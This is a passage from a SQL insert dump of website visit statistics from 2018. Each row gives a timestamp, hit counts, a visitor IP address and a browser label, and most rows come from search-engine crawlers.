149.40','other'),(295015,1535309533,1,1,0,0,'54.36.148.184','other'),(295016,1535309593,1,1,0,0,'54.36.149.84','other'),(295017,1535309743,1,1,0,0,'54.36.148.212','other'),(295018,1535309826,1,0,1,0,'66.249.66.155',''),(295019,1535309962,2,2,0,0,'141.8.142.74','other'),(295020,1535310327,1,1,0,0,'54.36.148.185','other'),(295021,1535310509,1,1,0,0,'54.36.148.168','other'),(295022,1535310588,1,1,0,0,'54.36.148.230','other'),(295023,1535310946,1,1,0,0,'185.220.101.34','other'),(295024,1535311046,1,1,0,0,'54.36.148.75','other'),(295025,1535311270,2,2,0,0,'216.244.66.241','other'),(295026,1535311489,1,1,0,0,'54.36.149.34','other'),(295027,1535311521,2,2,0,0,'141.8.142.74','other'),(295028,1535311684,1,1,0,0,'54.36.149.96','other'),(295029,1535311785,1,1,0,0,'54.36.149.48','other'),(295030,1535311798,1,1,0,0,'54.36.148.29','other'),(295031,1535312186,1,1,0,0,'54.36.148.92','other'),(295032,1535312266,1,1,0,0,'66.249.66.61','chrome'),(295033,1535312815,1,1,0,0,'54.36.149.35','other'),(295034,1535313048,1,1,0,0,'54.36.148.126','other'),(295035,1535313328,1,1,0,0,'54.36.149.22','other'),(295036,1535313532,1,1,0,0,'141.8.142.74','other'),(295037,1535313753,1,1,0,0,'54.36.148.59','other'),(295038,1535313883,1,0,1,0,'66.249.66.155',''),(295039,1535313908,1,1,0,0,'207.46.13.236','other'),(295040,1535313972,1,1,0,0,'54.36.148.223','other'),(295041,1535314009,1,0,1,0,'66.249.66.156',''),(295042,1535314528,1,1,0,0,'185.220.101.45','other'),(295043,1535314579,2,2,0,0,'173.208.200.154','other'),(295044,1535314721,1,1,0,0,'54.165.59.7','other'),(295045,1535314860,2,0,2,0,'66.249.66.155',''),(295046,1535314976,1,0,1,0,'66.249.66.156',''),(295047,1535315134,1,1,0,0,'54.36.148.221','other'),(295048,1535315173,2,2,0,0,'178.154.171.88','other'),(295049,1535315182,1,1,0,0,'178.154.200.41','other'),(295050,1535315186,1,1,0,0,'87.250.224.46','other'),(295051,1535315739,1,1,0,0,'54.36.148.181','other'),(295052,1535316258,1,1,0,0,'54.36.148.52','other'),(295053,1535316312,1,1,0,0,'54.36.148.118','other'),(295054,1535316546,2,2,0,0,'216.244.66.241','other'),(295055,1535316624,1,1,0,0,'54.36.149.102','other'),(295056,1535316922,1,1,0,0,'54.36.149.19','other'),(295057,1535317001,1,1,0,0,'54.36.148.23','other'),(295058,1535317110,1,1,0,0,'54.36.148.60','other'),(295059,1535317144,1,0,1,0,'66.249.66.57',''),(295060,1535317161,1,0,1,0,'66.249.66.59',''),(295061,1535317210,1,1,0,0,'54.36.148.45','other'),(295062,1535317309,1,1,0,0,'54.36.148.43','other'),(295063,1535317465,2,0,2,0,'66.249.66.155',''),(295064,1535317807,1,0,1,0,'66.249.66.156',''),(295065,1535317846,1,1,0,0,'141.8.142.74','other'),(295066,1535317878,2,1,1,0,'66.249.66.61',''),(295067,1535318017,1,1,0,0,'8.29.198.26','other'),(295068,1535318073,1,1,0,0,'54.36.148.148','other'),(295069,1535318125,1,1,0,0,'78.109.23.1','other'),(295070,1535318255,1,1,0,0,'54.36.149.92','other'),(295071,1535318278,1,1,0,0,'54.36.148.65','other'),(295072,1535318460,1,1,0,0,'95.163.255.94','other'),(295073,1535318738,1,1,0,0,'216.244.66.241','other'),(295074,1535318912,1,1,0,0,'54.36.148.177','other'),(295075,1535318930,1,1,0,0,'54.36.149.98','other'),(295076,1535319103,1,1,0,0,'54.36.148.229','other'),(295077,1535319352,1,0,1,0,'66.249.66.61',''),(295078,1535319427,1,1,0,0,'54.36.149.17','other'),(295079,1535319748,1,1,0,0,'157.55.39.250','other'),(295080,1535319892,1,1,0,0,'80.252.154.233','chrome'),(295081,1535320307,1,1,0,0,'141.8.142.74','other'),(295082,1535320406,1,1,0,0,'54.36.148.197','other'),(295083,1535320532,1,0,1,0,'66.249.66.59',''),(295084,1535320561,1,0,1,0,'66.249.66.155',''),(295085,1535320751,1,1,0,0,'54.36.148.133','other'),(295086,1535320753,1,1,0,0,'54.36.148.205','other'),(295087,1535321004,1,1,0,0,'216.244.66.241','other'),(295088,1535321011,1,1,0,0,'207.46.13.236','other'),(295089,1535321048,1,1,0,0,'54.36.148.136','other'),(295090,1535321484,1,1,0,0,'141.8.142.74','other'),(295091,1535321494,1,1,0,0,'178.154.171.88','other'),(295092,1535321637,1,1,0,0,'54.36.149.93','other'),(295093,1535322654,2,2,0,0,'178.154.171.88','other'),(295094,1535322886,1,1,0,0,'54.36.148.133','other'),(295095,1535323203,1,1,0,0,'54.36.149.58','other'),(295096,1535323213,1,1,0,0,'54.36.149.70','other'),(295097,1535323244,2,1,1,0,'66.249.66.59',''),(295098,1535323418,2,0,2,0,'66.249.66.157',''),(295099,1535323487,1,1,0,0,'66.249.66.57','chrome'),(295100,1535323526,1,0,1,0,'66.249.66.155',''),(295101,1535323634,1,1,0,0,'216.244.66.241','other'),(295102,1535323717,1,1,0,0,'54.36.148.85','other'),(295103,1535323768,1,1,0,0,'54.36.148.247','other'),(295104,1535323905,2,1,1,0,'66.249.66.155',''),(295105,1535324198,1,1,0,0,'54.36.149.105','other'),(295106,1535324498,1,1,0,0,'54.36.148.214','other'),(295107,1535324596,1,1,0,0,'54.36.149.26','other'),(295108,1535324695,1,1,0,0,'54.36.148.16','other'),(295109,1535324848,1,1,0,0,'87.250.224.46','other'),(295110,1535324887,1,0,1,0,'66.249.66.156',''),(295111,1535325021,3,3,0,0,'178.154.171.88','other'),(295112,1535325097,1,1,0,0,'54.36.148.246','other'),(295113,1535325371,1,1,0,0,'164.132.51.91','other'),(295114,1535325579,1,1,0,0,'54.36.148.147','other'),(295115,1535325590,1,1,0,0,'141.8.142.74','other'),(295116,1535325729,1,0,1,0,'66.249.66.155',''),(295117,1535326316,1,1,0,0,'54.36.148.86','other'),(295118,1535326452,1,1,0,0,'54.36.148.185','other'),(295119,1535326489,1,0,1,0,'66.249.66.156',''),(295120,1535327030,1,1,0,0,'54.36.149.83','other'),(295121,1535327178,1,1,0,0,'157.55.39.250','other'),(295122,1535327467,1,0,1,0,'66.249.66.61',''),(295123,1535327527,1,1,0,0,'54.36.148.216','other'),(295124,1535327644,1,1,0,0,'54.36.148.50','other'),(295125,1535327835,1,1,0,0,'54.36.148.41','other'),(295126,1535327940,1,1,0,0,'54.36.148.36','other'),(295127,1535328024,1,0,1,0,'66.249.66.59',''),(295128,1535328030,1,1,0,0,'54.36.148.187','other'),(295129,1535328173,1,1,0,0,'54.36.149.93','other'),(295130,1535328402,1,1,0,0,'54.36.149.11','other'),(295131,1535328847,1,1,0,0,'54.36.148.128','other'),(295132,1535328877,1,1,0,0,'8.29.198.25','other'),(295133,1535328925,1,1,0,0,'185.220.101.9','other'),(295134,1535329143,1,1,0,0,'54.36.148.37','other'),(295135,1535329246,1,1,0,0,'54.36.148.243','other'),(295136,1535329982,1,1,0,0,'66.249.66.61','chrome'),(295137,1535330086,1,1,0,0,'54.36.148.97','other'),(295138,1535330235,1,1,0,0,'87.250.224.46','other'),(295139,1535330316,1,1,0,0,'54.36.148.175','other'),(295140,1535330547,1,1,0,0,'54.36.148.37','other'),(295141,1535330875,1,1,0,0,'207.46.13.236','other'),(295142,1535330985,1,1,0,0,'216.244.66.241','other'),(295143,1535330987,1,1,0,0,'54.36.149.52','other'),(295144,1535331324,1,1,0,0,'178.154.171.88','other'),(295145,1535331461,1,1,0,0,'54.36.148.178','other'),(295146,1535331578,1,1,0,0,'54.36.148.28','other'),(295147,1535331755,1,1,0,0,'54.36.148.176','other'),(295148,1535331805,1,1,0,0,'54.36.149.56','other'),(295149,1535332135,1,0,1,0,'66.249.66.157',''),(295150,1535332169,1,1,0,0,'54.36.148.32','other'),(295151,1535332278,1,1,0,0,'54.36.148.183','other'),(295152,1535332317,1,1,0,0,'54.36.148.248','other'),(295153,1535332338,1,0,1,0,'66.249.66.156',''),(295154,1535332516,1,1,0,0,'77.247.181.165','other'),(295155,1535332588,1,1,0,0,'54.36.148.164','other'),(295156,1535332667,1,1,0,0,'54.36.148.202','other'),(295157,1535332728,1,1,0,0,'141.8.142.74','other'),(295158,1535332751,1,1,0,0,'54.36.148.72','other'),(295159,1535333193,1,1,0,0,'54.36.148.97','other'),(295160,1535333431,1,1,0,0,'66.249.66.61','chrome'),(295161,1535333452,1,1,0,0,'54.36.148.136','other'),(295162,1535333530,1,1,0,0,'54.36.148.218','other'),(295163,1535333706,1,1,0,0,'54.36.149.76','other'),(295164,1535333927,2,2,0,0,'141.8.142.74','other'),(295165,1535334267,1,1,0,0,'54.36.148.141','other'),(295166,1535334438,1,1,0,0,'54.36.148.75','other'),(295167,1535334759,1,1,0,0,'54.36.149.92','other'),(295168,1535335065,1,1,0,0,'91.209.11.236','other'),(295169,1535335253,1,1,0,0,'173.234.159.250','other'),(295170,1535335388,1,1,0,0,'54.36.148.141','other'),(295171,1535335663,1,0,1,0,'66.249.66.157',''),(295172,1535336118,1,1,0,0,'185.200.123.12','other'),(295173,1535336139,1,1,0,0,'54.36.149.57','other'),(295174,1535336156,1,1,0,0,'54.36.149.78','other'),(295175,1535336830,1,1,0,0,'54.36.148.103','other'),(295176,1535337012,1,1,0,0,'54.36.148.42','other'),(295177,1535337122,1,1,0,0,'54.36.148.169','other'),(295178,1535337435,1,1,0,0,'54.36.149.42','other'),(295179,1535337466,1,1,0,0,'54.36.148.206','other'),(295180,1535337475,2,2,0,0,'54.36.148.154','other'),(295181,1535337598,1,1,0,0,'178.154.171.88','other'),(295182,1535337688,1,1,0,0,'54.36.149.50','other'),(295183,1535337734,1,1,0,0,'40.77.167.80','other'),(295184,1535337751,1,1,0,0,'54.36.149.103','other'),(295185,1535338336,1,1,0,0,'54.36.148.145','other'),(295186,1535338450,1,1,0,0,'54.36.148.67','other'),(295187,1535338621,1,1,0,0,'54.36.148.106','other'),(295188,1535338711,1,1,0,0,'54.36.148.17','other'),(295189,1535338730,1,1,0,0,'216.244.66.241','other'),(295190,1535339071,1,1,0,0,'54.36.149.0','other'),(295191,1535339076,1,1,0,0,'54.36.148.109','other'),(295192,1535339110,1,1,0,0,'54.36.148.116','other'),(295193,1535339145,1,1,0,0,'54.36.149.101','other'),(295194,1535339705,1,1,0,0,'178.154.171.88','other'),(295195,1535339727,1,1,0,0,'8.29.198.27','other'),(295196,1535339799,19,19,0,0,'207.46.13.236','other'),(295197,1535339817,1,1,0,0,'54.36.148.186','other'),(295198,1535339954,12,12,0,0,'207.46.13.151','other'),(295199,1535339959,1,1,0,0,'54.36.148.136','other'),(295200,1535339966,17,17,0,0,'40.77.167.80','other'),(295201,1535339982,7,7,0,0,'157.55.39.250','other'),(295202,1535340251,1,1,0,0,'141.8.142.74','other'),(295203,1535340405,1,1,0,0,'54.36.149.91','other'),(295204,1535340829,1,1,0,0,'54.36.148.199','other'),(295205,1535340909,1,1,0,0,'54.36.148.147','other'),(295206,1535340955,1,1,0,0,'54.36.149.68','other'),(295207,1535341003,1,1,0,0,'54.36.149.102','other'),(295208,1535341383,1,1,0,0,'54.36.149.105','other'),(295209,1535341523,1,1,0,0,'54.36.148.122','other'),(295210,1535341752,1,1,0,0,'54.36.149.37','other'),(295211,1535341983,1,1,0,0,'54.36.148.232','other'),(295212,1535342023,1,1,0,0,'54.36.149.51','other'),(295213,1535342222,1,1,0,0,'54.36.149.45','other'),(295214,1535342919,1,0,1,0,'66.249.66.157',''),(295215,1535342952,1,1,0,0,'54.36.148.41','other'),(295216,1535343012,1,1,0,0,'66.249.66.57','chrome'),(295217,1535343075,1,1,0,0,'178.154.171.10','other'),(295218,1535343330,1,1,0,0,'185.220.101.10','other'),(295219,1535343399,1,1,0,0,'54.36.148.88','other'),(295220,1535344083,1,1,0,0,'216.244.66.241','other'),(295221,1535344095,1,1,0,0,'54.36.149.15','other'),(295222,1535344226,1,1,0,0,'144.217.5.52','other'),(295223,1535344369,1,1,0,0,'54.36.148.183','other'),(295224,1535344371,1,1,0,0,'207.46.13.151','other'),(295225,1535344372,1,1,0,0,'54.36.149.10','other'),(295226,1535344529,1,1,0,0,'54.36.148.119','other'),(295227,1535344539,1,1,0,0,'54.36.149.34','other'),(295228,1535344590,1,1,0,0,'54.36.148.224','other'),(295229,1535344656,1,1,0,0,'54.36.149.31','other'),(295230,1535345076,1,1,0,0,'54.36.148.54','other'),(295231,1535345091,1,1,0,0,'54.36.148.84','other'),(295232,1535345100,1,1,0,0,'54.36.148.59','other'),(295233,1535345116,1,1,0,0,'54.36.148.177','other'),(295234,1535345158,1,1,0,0,'54.36.148.19','other'),(295235,1535345603,1,1,0,0,'54.36.149.89','other'),(295236,1535345635,1,1,0,0,'213.180.203.8','other'),(295237,1535345798,1,1,0,0,'54.36.148.118','other'),(295238,1535345972,1,1,0,0,'54.36.149.1','other'),(295239,1535346380,1,1,0,0,'54.36.148.187','other'),(295240,1535346922,1,1,0,0,'51.15.64.212','other'),(295241,1535347118,1,0,1,0,'66.249.66.157',''),(295242,1535347241,1,0,1,0,'66.249.66.156',''),(295243,1535347331,1,1,0,0,'66.249.66.59','chrome'),(295244,1535347494,1,1,0,0,'141.8.142.74','other'),(295245,1535347602,1,1,0,0,'54.36.148.57','other'),(295246,1535347767,1,1,0,0,'54.36.148.70','other'),(295247,1535348165,1,1,0,0,'54.36.149.43','other'),(295248,1535348473,1,1,0,0,'54.36.149.75','other'),(295249,1535348916,1,1,0,0,'54.36.149.19','other'),(295250,1535349104,1,0,1,0,'66.249.66.156',''),(295251,1535349123,1,1,0,0,'54.36.148.235','other'),(295252,1535349126,1,1,0,0,'95.163.255.97','other'),(295253,1535349354,1,1,0,0,'54.36.148.18','other'),(295254,1535349495,1,1,0,0,'185.191.204.13','chrome'),(295255,1535349884,1,1,0,0,'54.36.148.143','other'),(295256,1535350054,1,1,0,0,'54.36.149.92','other'),(295257,1535350201,1,1,0,0,'87.250.224.46','other'),(295258,1535350259,1,1,0,0,'54.36.148.83','other'),(295259,1535350370,1,1,0,0,'54.36.148.25','other'),(295260,1535350522,1,1,0,0,'77.247.181.165','other'),(295261,1535350566,1,1,0,0,'8.29.198.25','other'),(295262,1535350743,1,1,0,0,'54.36.148.255','other'),(295263,1535350915,1,1,0,0,'207.46.13.151','other'),(295264,1535350932,1,1,0,0,'54.36.149.16','other'),(295265,1535351118,1,1,0,0,'91.196.178.169','chrome'),(295266,1535351356,2,2,0,0,'178.154.171.88','other'),(295267,1535351447,1,1,0,0,'37.53.137.43','firefox'),(295268,1535351476,1,1,0,0,'54.36.148.98','other'),(295269,1535351618,1,1,0,0,'54.36.148.213','other'),(295270,1535351759,1,1,0,0,'54.36.148.24','other'),(295271,1535351861,1,1,0,0,'54.36.149.42','other'),(295272,1535351875,1,0,1,0,'66.249.66.61',''),(295273,1535351896,1,0,1,0,'66.249.66.57',''),(295274,1535352114,2,1,1,0,'66.249.66.61',''),(295275,1535352121,1,0,1,0,'66.249.66.156',''),(295276,1535352143,1,0,1,0,'66.249.66.155',''),(295277,1535352250,2,2,0,0,'141.8.142.74','other'),(295278,1535352276,1,1,0,0,'95.132.56.33','firefox'),(295279,1535352322,1,1,0,0,'82.207.49.122','chrome'),(295280,1535352327,1,1,0,0,'54.36.148.39','other'),(295281,1535352403,1,1,0,0,'54.36.148.176','other'),(295282,1535352420,1,1,0,0,'54.36.148.51','other'),(295283,1535352435,1,1,0,0,'54.36.148.175','other'),(295284,1535352610,1,1,0,0,'66.249.66.59','chrome'),(295285,1535352668,1,1,0,0,'54.36.149.1','other'),(295286,1535353106,1,1,0,0,'54.36.148.195','other'),(295287,1535353231,1,1,0,0,'54.36.148.238','other'),(295288,1535353263,1,1,0,0,'54.36.148.94','other'),(295289,1535353325,1,1,0,0,'54.36.148.212','other'),(295290,1535353350,1,1,0,0,'54.36.148.74','other'),(295291,1535353551,1,1,0,0,'178.95.67.148','chrome'),(295292,1535353797,1,1,0,0,'216.244.66.241','other'),(295293,1535353859,1,1,0,0,'54.36.149.67','other'),(295294,1535354039,1,1,0,0,'207.46.13.151','other'),(295295,1535354079,1,0,1,0,'66.249.66.156',''),(295296,1535354119,1,0,1,0,'66.249.66.157',''),(295297,1535354337,1,1,0,0,'54.36.148.57','other'),(295298,1535354472,1,1,0,0,'54.36.148.22','other'),(295299,1535354761,1,1,0,0,'40.77.167.80','other'),(295300,1535354911,2,2,0,0,'178.154.171.88','other'),(295301,1535355276,1,1,0,0,'54.36.149.14','other'),(295302,1535355370,1,1,0,0,'157.55.39.250','other'),(295303,1535355804,1,0,1,0,'66.249.66.157',''),(295304,1535356117,1,1,0,0,'54.36.148.173','other'),(295305,1535356126,1,1,0,0,'54.36.149.2','other'),(295306,1535356298,1,1,0,0,'207.46.13.236','other'),(295307,1535356468,1,1,0,0,'5.45.207.58','other'),(295308,1535356472,1,1,0,0,'216.244.66.241','other'),(295309,1535356529,1,1,0,0,'54.36.148.15','other'),(295310,1535356553,1,1,0,0,'54.36.149.65','other'),(295311,1535356686,2,2,0,0,'91.196.178.99','chrome'),(295312,1535356827,1,1,0,0,'54.36.148.186','other'),(295313,1535356860,1,1,0,0,'162.210.196.130','other'),(295314,1535356956,1,1,0,0,'195.20.125.6','chrome'),(295315,1535357222,1,1,0,0,'54.36.149.95','other'),(295316,1535357371,1,1,0,0,'141.8.142.74','other'),(295317,1535357380,1,1,0,0,'66.249.66.57','chrome'),(295318,1535357462,1,1,0,0,'54.36.149.69','other'),(295319,1535357499,1,1,0,0,'37.53.163.173','chrome'),(295320,1535357556,1,1,0,0,'78.111.190.15','chrome'),(295321,1535357616,1,1,0,0,'54.36.149.18','other'),(295322,1535357698,1,1,0,0,'91.196.178.84','chrome'),(295323,1535357752,1,1,0,0,'77.111.247.10','chrome'),(295324,1535357835,1,1,0,0,'91.196.178.99','chrome'),(295325,1535358171,1,1,0,0,'54.36.149.49','other'),(295326,1535358269,1,1,0,0,'54.36.148.226','other'),(295327,1535358341,1,1,0,0,'54.36.149.76','other'),(295328,1535358756,1,1,0,0,'54.36.148.223','other'),(295329,1535358832,2,2,0,0,'216.244.66.241','other'),(295330,1535358974,1,1,0,0,'54.36.148.243','other'),(295331,1535359154,1,1,0,0,'54.36.148.63','other'),(295332,1535359233,1,0,1,0,'66.249.66.156',''),(295333,1535359435,1,1,0,0,'54.36.148.216','other'),(295334,1535359748,1,1,0,0,'54.36.149.65','other'),(295335,1535359788,1,1,0,0,'91.196.178.80','firefox'),(295336,1535359791,1,1,0,0,'54.36.149.54','other'),(295337,1535359792,1,1,0,0,'54.36.148.144','other'),(295338,1535360177,1,1,0,0,'54.36.149.81','other'),(295339,1535360366,1,1,0,0,'141.8.142.74','other'),(295340,1535360367,1,1,0,0,'54.36.148.230','other'),(295341,1535360726,1,1,0,0,'207.46.13.236','other'),(295342,1535360731,1,1,0,0,'54.36.148.190','other'),(295343,1535360820,1,1,0,0,'54.36.148.35','other'),(295344,1535361385,2,2,0,0,'141.8.142.74','other'),(295345,1535361409,1,1,0,0,'8.29.198.25','other'),(295346,1535362043,1,1,0,0,'91.196.178.169','chrome'),(295347,1535362427,1,1,0,0,'54.36.148.130','other'),(295348,1535362663,1,1,0,0,'54.36.149.13','other'),(295349,1535362789,1,1,0,0,'87.250.224.46','other'),(295350,1535362958,1,1,0,0,'54.36.148.186','other'),(295351,1535363017,1,1,0,0,'54.36.148.153','other'),(295352,1535363036,1,1,0,0,'66.249.66.59','chrome'),(295353,1535363041,1,1,0,0,'37.73.197.94','other'),(295354,1535363216,1,1,0,0,'54.36.149.46','other'),(295355,1535363400,1,1,0,0,'178.154.171.88','other'),(295356,1535363530,1,1,0,0,'52.5.122.69','firefox'),(295357,1535363669,1,1,0,0,'54.36.148.86','other'),(295358,1535363716,1,1,0,0,'87.250.224.46','other'),(295359,1535363796,1,1,0,0,'91.196.178.134','firefox'),(295360,1535364528,2,2,0,0,'91.196.178.75','chrome'),(295361,1535364873,1,1,0,0,'91.196.178.169','chrome'),(295362,1535365411,1,1,0,0,'106.38.241.141','other'),(295363,1535365782,1,1,0,0,'130.180.216.136','chrome'),(295364,1535365841,1,1,0,0,'216.244.66.241','other'),(295365,1535366168,1,1,0,0,'54.36.148.153','other'),(295366,1535366267,1,1,0,0,'141.8.142.74','other'),(295367,1535366286,1,1,0,0,'54.36.148.50','other'),(295368,1535366432,1,1,0,0,'54.36.148.187','other'),(295369,1535366740,1,1,0,0,'54.36.148.248','other'),(295370,1535366843,1,1,0,0,'54.36.149.68','other'),(295371,1535367063,1,1,0,0,'216.244.66.241','other'),(295372,1535367146,1,1,0,0,'54.36.148.98','other'),(295373,1535367655,1,1,0,0,'66.249.66.155','chrome'),(295374,1535367757,1,1,0,0,'157.55.39.112','other'),(295375,1535367931,1,1,0,0,'54.36.148.166','other'),(295376,1535367945,1,1,0,0,'54.36.148.63','other'),(295377,1535368104,1,1,0,0,'54.36.148.199','other'),(295378,1535368154,1,1,0,0,'66.249.66.59','chrome'),(295379,1535368168,1,1,0,0,'54.36.148.138','other'),(295380,1535368197,1,1,0,0,'54.36.149.100','other'),(295381,1535368248,1,1,0,0,'46.200.15.232','chrome'),(295382,1535368395,1,1,0,0,'54.36.148.109','other'),(295383,1535368712,1,1,0,0,'54.36.149.55','other'),(295384,1535369056,2,2,0,0,'216.244.66.241','other'),(295385,1535369081,1,1,0,0,'54.36.149.78','other'),(295386,1535369484,2,2,0,0,'91.196.178.80','chrome'),(295388,1535369590,1,1,0,0,'54.36.148.207','other'),(295389,1535369707,1,1,0,0,'54.36.149.83','other'),(295390,1535369849,1,1,0,0,'178.154.171.88','other'),(295391,1535369850,1,1,0,0,'141.8.142.74','other'),(295392,1535370102,2,2,0,0,'79.160.153.206','chrome'),(295393,1535370884,1,1,0,0,'178.154.171.88','other'),(295394,1535371019,1,1,0,0,'79.160.153.206','chrome'),(295395,1535371052,1,1,0,0,'54.36.149.16','other'),(295396,1535371205,1,1,0,0,'54.36.148.112','other'),(295397,1535371243,1,1,0,0,'54.36.149.59','other'),(295398,1535371353,1,1,0,0,'95.135.54.57','chrome'),(295399,1535371490,1,1,0,0,'141.8.142.74','other'),(295400,1535371661,1,1,0,0,'54.36.148.124','other'),(295401,1535371668,1,1,0,0,'54.36.148.21','other'),(295402,1535371838,1,1,0,0,'54.36.148.203','other'),(295403,1535371930,1,1,0,0,'79.160.153.206','chrome'),(295404,1535371997,1,1,0,0,'54.36.148.106','other'),(295405,1535372026,1,1,0,0,'216.244.66.241','other'),(295406,1535372058,1,1,0,0,'91.196.178.75','firefox'),(295407,1535372249,1,1,0,0,'8.29.198.25','other'),(295408,1535372262,2,2,0,0,'31.43.144.121','chrome'),(295409,1535372352,1,1,0,0,'46.201.184.63','chrome'),(295410,1535372621,1,1,0,0,'54.36.148.36','other'),(295411,1535372756,1,1,0,0,'54.36.149.33','other'),(295412,1535372827,1,1,0,0,'54.36.148.248','other'),(295413,1535373153,1,1,0,0,'54.36.148.244','other'),(295414,1535373249,1,1,0,0,'54.36.149.34','other'),(295415,1535373482,1,1,0,0,'54.36.148.160','other'),(295416,1535373632,1,1,0,0,'31.43.144.121','chrome'),(295417,1535373664,2,2,0,0,'141.8.142.74','other'),(295418,1535373692,1,1,0,0,'66.249.66.59','chrome'),(295419,1535373799,1,1,0,0,'54.36.149.15','other'),(295420,1535373947,1,1,0,0,'54.36.148.216','other'),(295421,1535374076,1,1,0,0,'178.154.171.88','other'),(295422,1535374205,1,1,0,0,'216.244.66.241','other'),(295423,1535374265,1,1,0,0,'54.36.149.92','other'),(295424,1535374349,1,1,0,0,'207.46.13.23','other'),(295425,1535374461,1,1,0,0,'54.36.148.109','other'),(295426,1535374652,1,1,0,0,'54.36.149.24','other'),(295427,1535374953,1,1,0,0,'91.196.122.242','chrome'),(295428,1535374965,1,1,0,0,'54.36.148.205','other'),(295429,1535374978,1,1,0,0,'178.95.67.148','chrome'),(295430,1535375005,2,2,0,0,'91.196.177.46','chrome'),(295431,1535375134,1,1,0,0,'91.196.178.132','firefox'),(295432,1535375906,1,1,0,0,'91.196.177.46','chrome'),(295433,1535376232,1,1,0,0,'31.43.31.187','chrome'),(295434,1535376265,1,1,0,0,'46.219.205.80','chrome'),(295435,1535376915,1,1,0,0,'178.154.200.41','other'),(295436,1535376947,1,1,0,0,'54.36.148.166','other'),(295437,1535377093,1,1,0,0,'216.244.66.241','other'),(295438,1535377095,1,1,0,0,'54.36.149.77','other'),(295439,1535377319,1,1,0,0,'54.36.148.241','other'),(295440,1535377359,1,1,0,0,'52.41.211.72','chrome'),(295441,1535377654,1,1,0,0,'77.93.41.218','chrome'),(295442,1535378420,1,1,0,0,'54.36.148.52','other'),(295443,1535378554,1,1,0,0,'216.244.66.241','other'),(295444,1535378571,1,1,0,0,'66.249.66.61','chrome'),(295445,1535378576,1,1,0,0,'54.36.149.27','other'),(295446,1535378612,1,1,0,0,'91.196.178.34','other'),(295447,1535378845,1,1,0,0,'54.36.148.159','other'),(295448,1535378870,1,1,0,0,'54.36.148.213','other'),(295449,1535379044,1,1,0,0,'178.154.171.88','other'),(295450,1535379220,1,1,0,0,'66.249.66.57','chrome'),(295451,1535379246,1,1,0,0,'54.36.149.17','other'),(295452,1535379309,1,1,0,0,'54.36.148.212','other'),(295453,1535379323,1,1,0,0,'54.36.148.254','other'),(295454,1535379353,1,1,0,0,'54.36.149.68','other'),(295455,1535379508,1,1,0,0,'91.196.177.46','chrome'),(295456,1535379715,3,3,0,0,'216.244.66.241','other'),(295457,1535379742,1,1,0,0,'54.36.148.150','other'),(295458,1535379832,2,2,0,0,'178.133.64.184','chrome'),(295459,1535379957,1,1,0,0,'54.36.148.160','other'),(295460,1535379961,1,1,0,0,'54.36.148.163','other'),(295461,1535380021,1,1,0,0,'87.250.224.46','other'),(295462,1535380339,1,0,1,0,'66.249.66.157',''),(295463,1535380351,1,1,0,0,'54.36.148.179','other'),(295464,1535380461,1,1,0,0,'54.36.149.13','other'),(295465,1535380478,1,1,0,0,'54.36.148.188','other'),(295466,1535380512,1,1,0,0,'91.196.178.33','chrome'),(295467,1535380587,1,1,0,0,'54.36.148.119','other'),(295468,1535381022,1,1,0,0,'46.211.119.206','chrome'),(295469,1535381421,1,1,0,0,'54.36.148.111','other'),(295470,1535381681,1,1,0,0,'54.36.149.20','other'),(295471,1535381708,1,1,0,0,'54.36.148.75','other'),(295472,1535381751,1,1,0,0,'54.36.149.105','other'),(295473,1535381772,1,1,0,0,'157.55.39.112','other'),(295474,1535381867,1,1,0,0,'54.36.149.81','other'),(295475,1535382185,1,1,0,0,'54.36.149.40','other'),(295476,1535382189,1,1,0,0,'54.36.149.92','other'),(295477,1535382401,1,1,0,0,'54.36.148.165','other'),(295478,1535382492,1,1,0,0,'54.36.148.124','other'),(295479,1535382842,1,1,0,0,'141.8.132.22','other'),(295480,1535382846,1,1,0,0,'141.8.142.74','other'),(295481,1535382973,1,1,0,0,'54.36.148.141','other'),(295482,1535383031,1,1,0,0,'54.36.148.178','other'),(295483,1535383139,1,1,0,0,'8.29.198.27','other'),(295484,1535383276,1,1,0,0,'77.93.41.218','chrome'),(295485,1535383526,1,1,0,0,'54.36.149.80','other'),(295486,1535383920,1,1,0,0,'91.196.177.46','chrome'),(295487,1535383935,1,1,0,0,'216.244.66.241','other'),(295488,1535383984,1,1,0,0,'46.211.157.171','chrome'),(295489,1535384128,1,1,0,0,'54.36.148.59','other'),(295490,1535384265,1,1,0,0,'54.36.148.110','other'),(295491,1535384387,1,1,0,0,'54.36.148.148','other'),(295492,1535384665,1,1,0,0,'188.230.43.254','other'),(295493,1535384695,1,1,0,0,'66.249.66.57','chrome'),(295494,1535384698,2,2,0,0,'54.36.148.168','other'),(295495,1535384744,1,1,0,0,'178.154.171.88','other'),(295496,1535384808,1,1,0,0,'87.250.224.46','other'),(295497,1535384993,1,1,0,0,'54.36.148.190','other'),(295498,1535386283,1,1,0,0,'157.55.39.101','other'),(295499,1535386483,1,1,0,0,'54.36.149.87','other'),(295500,1535386538,1,1,0,0,'54.36.148.103','other'),(295501,1535386630,1,1,0,0,'54.36.148.132','other'),(295502,1535386645,1,1,0,0,'37.9.113.182','other'),(295503,1535386697,1,1,0,0,'37.9.113.110','other'),(295504,1535386753,1,1,0,0,'54.36.149.13','other'),(295505,1535387065,1,1,0,0,'188.230.43.254','other'),(295506,1535387364,2,2,0,0,'216.244.66.241','other'),(295507,1535387388,1,1,0,0,'54.36.148.34','other'),(295508,1535387412,1,0,1,0,'66.249.66.155',''),(295509,1535387584,1,1,0,0,'95.163.255.150','other'),(295510,1535387874,1,1,0,0,'54.36.148.113','other'),(295511,1535388001,1,1,0,0,'193.106.30.99','firefox'),(295512,1535388177,1,1,0,0,'54.36.149.83','other'),(295513,1535388220,1,1,0,0,'54.36.149.20','other'),(295514,1535388458,1,1,0,0,'91.196.178.91','firefox'),(295515,1535388585,1,1,0,0,'216.244.66.241','other'),(295516,1535388843,1,0,1,0,'66.249.66.155',''),(295517,1535389226,1,0,1,0,'66.249.66.151',''),(295518,1535389282,1,1,0,0,'54.36.149.100','other'),(295519,1535389321,1,1,0,0,'66.249.66.61','chrome'),(295520,1535389525,2,2,0,0,'216.244.66.241','other'),(295521,1535389639,1,1,0,0,'163.172.4.153','other'),(295522,1535389926,1,1,0,0,'54.36.148.73','other'),(295523,1535389945,1,1,0,0,'54.36.149.81','other'),(295524,1535389960,1,1,0,0,'54.36.149.86','other'),(295525,1535390340,1,1,0,0,'54.36.148.164','other'),(295526,1535390694,1,1,0,0,'54.36.148.100','other'),(295527,1535390976,1,1,0,0,'54.36.149.88','other'),(295528,1535391395,1,1,0,0,'54.36.149.100','other'),(295529,1535391431,1,1,0,0,'54.36.149.74','other'